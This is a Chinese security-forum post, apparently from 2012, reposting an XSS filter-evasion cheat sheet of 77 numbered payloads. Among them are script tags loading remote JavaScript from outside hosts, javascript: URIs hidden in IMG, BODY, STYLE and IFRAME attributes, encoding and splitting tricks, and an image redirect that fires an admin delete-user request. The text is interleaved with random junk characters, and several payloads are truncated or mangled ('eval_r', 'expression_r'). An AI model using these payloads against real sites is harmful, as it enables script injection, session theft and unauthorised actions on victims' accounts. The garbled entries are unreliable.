貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
Q9 y& j" ]% [' j I4 F5 e
3 |4 D' i, N K# }7 R0 z2 a (1)普通的XSS JavaScript注入
. U; k. \# x0 h, W <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! P; k2 X/ w2 |1 c( U- R! `" b' e
6 X1 ^$ X+ m* k8 G6 H, }; x (2)IMG标签XSS使用JavaScript命令
& r6 F& i3 {0 l <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>4 J4 F7 U& `$ @; C8 v
; I1 L7 F$ [% E5 Q4 i; |8 G# N! k1 f
(3)IMG标签无分号无引号9 p' @3 L# V1 k4 G X- B
<IMG SRC=javascript:alert(‘XSS’)>! d2 s2 u$ k8 s; K
W( ^2 w% U$ ?* W (4)IMG标签大小写不敏感
. r" C( [3 V9 D <IMG SRC=JaVaScRiPt:alert(‘XSS’)>! I. I" i! `5 _: i( ~" _( A
# G5 ]3 A# _5 Q" {5 u ^8 @5 L (5)HTML编码(必须有分号)
7 R( b7 b8 R! c6 K0 s9 c <IMG SRC=javascript:alert(“XSS”)>
+ S3 T* w9 j8 j0 Z6 p4 w3 G+ M: [9 }- }7 ]8 L6 s2 m; Z9 b$ z
(6)修正缺陷IMG标签0 n" f4 w2 U) {# ?$ D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, I3 t* g, i6 b0 I3 z
: L1 K$ P3 V" e- r! n9 f' [! Y! @ (7)formCharCode标签(计算器)
/ y) c w9 i% e1 Z% q, B) j <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 ?" r/ H4 r+ B+ j" x4 m% ~9 W
* T( W2 V. f6 Y3 U# L5 o (8)UTF-8的Unicode编码(计算器)
5 ?1 L8 m( @0 }, J <IMG SRC=jav..省略..S')>; G' ?7 Q( d B) l+ y
- ]# O: a) n6 k8 Z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 p" w6 z/ i4 g, x <IMG SRC=jav..省略..S')>6 H8 ]* Y8 q9 S
4 \1 b% |/ U; ^9 u (10)十六进制编码也是没有分号(计算器)
2 v) Q. P* O' B2 b- Q- C <IMG SRC=java..省略..XSS')>3 Q' V; C9 ]. u! [9 R
2 O/ I, g- n0 N$ p4 ` (11)嵌入式标签,将Javascript分开, @. p" D; j5 x
<IMG SRC=”jav ascript:alert(‘XSS’);”>. b; |: ^+ ]/ `8 l# T
& H5 K7 `# V9 `' o7 {; t5 ~
(12)嵌入式编码标签,将Javascript分开+ ? M w1 b& r# ]& t) _3 ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>, w( ?- m" z. L: R6 z" t" ]
8 _7 F% S4 F7 Y; B3 ~# Y2 b0 Q (13)嵌入式换行符: X: ~* d0 q+ L$ Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ M3 a' \, ]5 M" C3 f
+ L- d" ]! @! d/ z (14)嵌入式回车+ w8 a# @% W$ H3 c& ?8 u
<IMG SRC=”jav ascript:alert(‘XSS’);”>! `3 H, J f5 F3 k4 S8 H' [
( K! _) F6 r7 j- r" h3 u (15)嵌入式多行注入JavaScript,这是XSS极端的例子7 A4 m2 E3 ~8 [6 t+ S4 G
<IMG SRC=”javascript:alert(‘XSS‘)”>* M. i8 Z3 B! H( c* |8 i$ d
. k' u5 r4 w0 m1 q, ^- F8 ^5 ?' H
(16)解决限制字符(要求同页面)" y! Z) {& O1 c) X4 g. ~* f
<script>z=’document.’</script>' g. v; r c, t8 x1 d
<script>z=z+’write(“‘</script>$ p7 @7 \& Q. ]0 q" Z( l4 o
<script>z=z+’<script’</script>% M4 z7 Y, a% O1 j5 w7 A& n
<script>z=z+’ src=ht’</script>$ r) r) I- u% ~* A& u0 d' r! K
<script>z=z+’tp://ww’</script>+ Y$ K: D" q5 }" F7 A- |4 G
<script>z=z+’w.shell’</script>2 S2 |* I* j2 }; W
<script>z=z+’.net/1.’</script>
! c F( j$ H0 |: ^9 w) M3 @ <script>z=z+’js></sc’</script># O s2 }: p- V' y, i
<script>z=z+’ript>”)’</script>. q; M$ W# f6 Q) e' G6 l0 G
<script>eval_r(z)</script>
$ k7 P3 {( N, }) A5 n, n. y3 l
& t# u6 e! a. ]+ r: h3 P# C (17)空字符
1 t% F f/ q2 E: _% { perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out9 }7 U: U4 b3 h) ?. n/ ^
$ k9 p! \- B% Q5 q+ @1 Z (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: o0 Z$ A- V8 {" O" J! Q
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 C, N4 K, g e& }
# q Z, \. _2 \4 ?: h l
(19)Spaces和meta前的IMG标签
A v( h6 X! ]! S% g! y <IMG SRC=” � javascript:alert(‘XSS’);”>
4 ?. o) A4 Y4 @. S/ i% p4 _! Y; J8 P
(20)Non-alpha-non-digit XSS
# D, c9 I! t9 P* B <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 s1 @) F X9 |' X
3 j+ V6 V! y# [" q
(21)Non-alpha-non-digit XSS to 26 e# D2 G1 ~# w( M3 v, C
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>' h, h# R P, ^( _1 m# L4 ?
4 d$ N! R( Y5 e; F (22)Non-alpha-non-digit XSS to 3; k7 W" J8 a( T! L1 @. t- J8 I
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- w: `! f/ _5 P1 t5 G# o
# I4 t+ e0 Z* ]& p3 L! ~* Q (23)双开括号
* e8 y0 m7 r5 E& R. W% j' _8 W <<SCRIPT>alert(“XSS”);//<</SCRIPT># z; Z! d- _, t' B7 M2 ^$ ~( a
+ X! U; Q- d7 |+ g! { (24)无结束脚本标记(仅火狐等浏览器)
8 ~; q! o7 s+ f. m1 }; z <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>! M& w& M) p" @) J# W( ^$ E
M1 O/ V- o% e7 B3 v c7 ?3 w- j (25)无结束脚本标记2. U h; t# |- }" u! S' J
<SCRIPT SRC=//3w.org/XSS/xss.js>
# `1 T, S7 T, L6 @# K
7 V$ D2 {, c7 q7 t( w8 A (26)半开的HTML/JavaScript XSS
( a: V' a8 k4 T* X; e. @ <IMG SRC=”javascript:alert(‘XSS’)”8 o C* ]7 @2 n" G7 S0 l' B
2 l' E+ R0 {3 Q' e9 s% C
(27)双开角括号
/ U/ J! `. X c9 [ U" g <iframe src=http://3w.org/XSS.html <4 ~$ E% M8 \; h$ U3 L
) A! y3 G# [% s) n (28)无单引号 双引号 分号
' k& E, m9 L, t) z3 B <SCRIPT>a=/XSS/: ^. Y! I; ]* v1 J+ E! E" R1 g- b
alert(a.source)</SCRIPT>! e! u: i1 W5 S0 b5 H6 E4 l
3 c1 c& S) N. t8 {( _: B (29)换码过滤的JavaScript6 p u; u9 `/ l4 O; c: }5 ^
\”;alert(‘XSS’);//
- o$ s) x8 K& F) b! g7 P$ I) d: i6 b% [# i" `9 ^" L- T. t
(30)结束Title标签5 V1 x1 }, {( L8 V. t3 K) q2 ?
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: c" s" q' \3 }% ]' U( p' q
5 ^8 C* {7 V" K" L (31)Input Image5 T* }0 ]. b$ ]1 d
<INPUT SRC=”javascript:alert(‘XSS’);”>
% ^8 u/ x4 W! b' O, ~: z6 a: K' w0 e
(32)BODY Image
- U5 s: }: ?/ |6 ~/ y( k$ G- O$ _ <BODY BACKGROUND=”javascript:alert(‘XSS’)”># Z: d& M4 M" W$ @3 n3 |* m4 f8 y
' g; e" }* T) H* F+ r
(33)BODY标签
# T. C$ T- M- D. ?0 t x <BODY(‘XSS’)>" q/ ?9 u$ t, Y' J8 q; ?
: @- f1 h( P# C6 r0 u
(34)IMG Dynsrc# |+ _/ E6 f" i- X# ~/ h9 }, B' S
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
: J1 v% T R; c$ I, J }- H
) I% l/ N n ~% _) J, d) t (35)IMG Lowsrc
J) b2 x+ e4 _ <IMG LOWSRC=”javascript:alert(‘XSS’)”>6 I" i" a T) V7 E3 ?/ u7 T3 M
" p6 j* T2 b4 x4 `" Q
(36)BGSOUND
% j" _8 T( _1 y2 C9 y6 |6 j <BGSOUND SRC=”javascript:alert(‘XSS’);”>1 W# X1 i$ I) ~
9 c3 R. a5 L6 \3 N& i. C (37)STYLE sheet
# e! N5 Q4 e# Q% V6 D5 V <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
8 u+ d( \4 @8 H; a- O8 d( M7 B% k& a( R7 ~! N. L% R3 P
(38)远程样式表2 [7 T- i3 V5 r
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ y v9 ?( X5 q! B2 h1 @& F; {
; P# h& y0 {" j/ d5 \; a (39)List-style-image(列表式)% M! @0 o0 [, I% M# ?
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS5 f" H5 R) p0 s
8 i( [% [/ ]/ F7 z. L
(40)IMG VBscript$ p4 ^* `2 Y3 y3 e* L6 l- ~
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, M8 r9 |! y& ]. p
. M, A b: ]; U N- g7 K- r% O4 K
(41)META链接url
, D! H7 H0 E% k6 L0 V% v/ G <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>) ^/ p, u6 c1 I
% t# x: q- x# o$ s6 \- X (42)Iframe6 r2 V& m- v/ w( a6 H
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>3 H" s' V% F1 y1 W& l& X
3 P T7 K& C8 i. k0 y: G. l (43)Frame7 g) ]! u' g% T! v- z* ^* T' u
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
) G9 i8 P h0 U0 k$ m$ N+ d/ r: J0 z4 [3 y( n$ _( K/ A$ R' n+ I' y
(44)Table/ y" ~) w7 I0 b/ r1 r
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* M; `, p4 t2 ?# N# D
) \/ I; E! c" v! m
(45)TD8 W/ ~$ i6 ]. E9 ?/ t* C- i# C- {
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 d1 ]2 R1 q% s" v! B9 u0 I- [& T+ X% j$ Y
(46)DIV background-image
4 S1 X' N7 J" E <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 _+ E0 _! {7 _
" F: `0 T! H7 E5 }/ @
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, I ~. {5 a* Z' G/ Y <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”># m; Z6 o4 s: a5 ]4 i4 d3 c% P
3 D& f' o4 d# H. h (48)DIV expression$ K: v# p5 n' [8 Q/ Y; a' j6 x
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
) x& w3 E+ ~ ?- d6 k
" H* a( P7 E8 A2 q (49)STYLE属性分拆表达# t9 {% X7 c9 {2 e4 L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: T) m: @/ c/ g% t7 {* j
* D$ E3 b% J0 E. [5 J (50)匿名STYLE(组成:开角号和一个字母开头), ^2 E0 Y! e5 D1 E# s
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 d& O$ o- W5 @5 F+ D2 Z; g x7 a4 G% f
(51)STYLE background-image7 \. L, V# j: G0 T8 V
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ Q6 j: K. ~8 f$ G: ]
P- t6 @3 }' V! X( [/ L. M (52)IMG STYLE方式
; B5 r0 K" G+ [! m exppression(alert(“XSS”))’>) Q4 @) s4 M, d N/ I: F' {" w
4 \, b( R8 @5 {$ V8 m; B' k
(53)STYLE background% a8 P. [1 e- i
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> W0 K% Y- K+ c
/ h1 {. k9 T# [' s/ h (54)BASE
' X7 D/ C! c! A8 H% Q <BASE HREF=”javascript:alert(‘XSS’);//”>5 m; x$ k9 T( W2 ?8 B, D
, s0 B+ g4 n$ S1 ~: G2 H (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
" { \ L; W5 O <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>& ]3 H! Z$ U& O% B' d( K
: E" W0 }! m2 d" u' r' ~: d
(56)在flash中使用ActionScrpt可以混进你XSS的代码, ]5 L3 }) l0 h+ e/ Y. T0 y
a=”get”;' F" @' M" S# m
b=”URL(\”";
# c8 v) a, @! _. h c=”javascript:”;
) C/ j) N3 h% e) B; f! W d=”alert(‘XSS’);\”)”;
: [; F# j0 x% J5 a' ~- v0 `1 q6 j eval_r(a+b+c+d);/ F2 ^9 Q$ J' z0 {, \
8 E# e. S/ M6 k7 |# |/ M
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 ? I! R8 J7 {/ l
<HTML xmlns:xss>
, {. ~9 W7 @: Y6 G <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> a+ M/ X/ d+ Y2 c& F
<xss:xss>XSS</xss:xss>; x6 t$ \* ?" M
</HTML>
7 Y% n/ l+ a) i- M- I. d) [% u" r( K( y4 `7 \# u
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 R0 t( K, m& @ <SCRIPT SRC=””></SCRIPT>
- c1 N* o$ x5 V8 F& F, I
3 U( q2 B2 N( R0 @; V (59)IMG嵌入式命令,可执行任意命令
; O) ^3 \" X7 E; l <IMG SRC=”http://www.XXX.com/a.php?a=b”>
5 Y, C- `! r7 v2 y4 }. ~+ q# m: y4 {
(60)IMG嵌入式命令(a.jpg在同服务器)
5 W( W% p4 W* l Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! J# f5 r$ e# T
# z! G, Y5 u# I3 X; k/ P (61)绕符号过滤& ~" R. Z& U* O
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% B' L+ U, P9 I. R y
7 T; D+ K4 `5 H (62)7 J# o: c: i1 O% J
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 }( A0 z7 W* R) ^ _
9 X( x: k6 ~( ]# @/ ^- O/ u) t (63)2 r; Z6 o4 h7 ~3 W; n8 |
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
. j4 _% g$ W" u( Q: `! n1 d4 _" {* H6 k
(64)
% B9 h* M+ z& |0 k/ z' Y <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, w/ h, B- u7 _8 i, x2 _. X3 r N$ a
(65)
4 ?$ Q% G6 L b" d <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>7 F2 F0 U. ]! M, O$ O. d
! I+ `2 S% m `' W7 L% w2 | t (66)
0 q7 |+ s+ f+ [! \$ ^5 ~. ~0 G <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>9 n& {# m9 r0 w$ m% B
! n# y5 K- M e2 z# ]/ T (67)
* l- v# l6 D/ u/ @/ U* s. n; l <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
# `% \* B/ }) ?1 |/ v7 I7 I6 F) q7 g9 O D' t5 H! k4 @
(68)URL绕行
) O# }, o$ o, |* M8 c- A( y) ]$ _ <A HREF=”http://127.0.0.1/”>XSS</A>
# r" g6 Y9 M K, D! S7 M
: b, d5 Z* y# u (69)URL编码# v6 V, y) k$ M3 N
<A HREF=”http://3w.org”>XSS</A>
) I, Y9 z7 S8 p3 V3 b7 K% ` f% _' L4 [! t' T2 b6 v* G
(70)IP十进制
' K7 m6 ~6 C- i1 P2 { <A HREF=”http://3232235521″>XSS</A>/ e0 d5 t$ _1 @' ]
) ]% x9 F: j! W0 f$ \) K d
(71)IP十六进制
1 m6 }9 ?. v+ i Q <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>* A' y* P3 Y6 @; Y) f; {5 P4 j
! X* ~7 X. O+ H& t3 n# s
(72)IP八进制
* j2 g. Y$ E8 r3 O( n8 g! |/ } U <A HREF=”http://0300.0250.0000.0001″>XSS</A>+ W. T E5 f: L; N+ M) K, Y
3 ~8 p4 t+ a5 C- o4 C) W (73)混合编码& }( F5 X* B6 |! m
<A HREF=”h
* j) L( k1 q: \, [# Q. } tt p://6 6.000146.0×7.147/”">XSS</A>2 _% l. \/ b# X2 h1 h% c
0 }( o/ y# z# j% e, E (74)节省[http:]4 K' Y- ?0 E' ?. h
<A HREF=”//www.google.com/”>XSS</A>
! p& x2 |8 y: E& j! ~7 b
4 B/ }- v G5 U$ f (75)节省[www]$ x) A4 i. v0 C' Q
<A HREF=”http://google.com/”>XSS</A>
: U5 K, Y X- n
# S8 R. v* s- A$ }/ h" h9 _: P (76)绝对点绝对DNS+ X. P" O' q2 Y+ B. W* o4 S" t8 ~
<A HREF=”http://www.google.com./”>XSS</A>" Q' J6 [- S. |3 J8 }
) w$ R0 c- n1 Y2 w: }
(77)javascript链接
: s. R- B6 k/ i' \8 |2 f <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对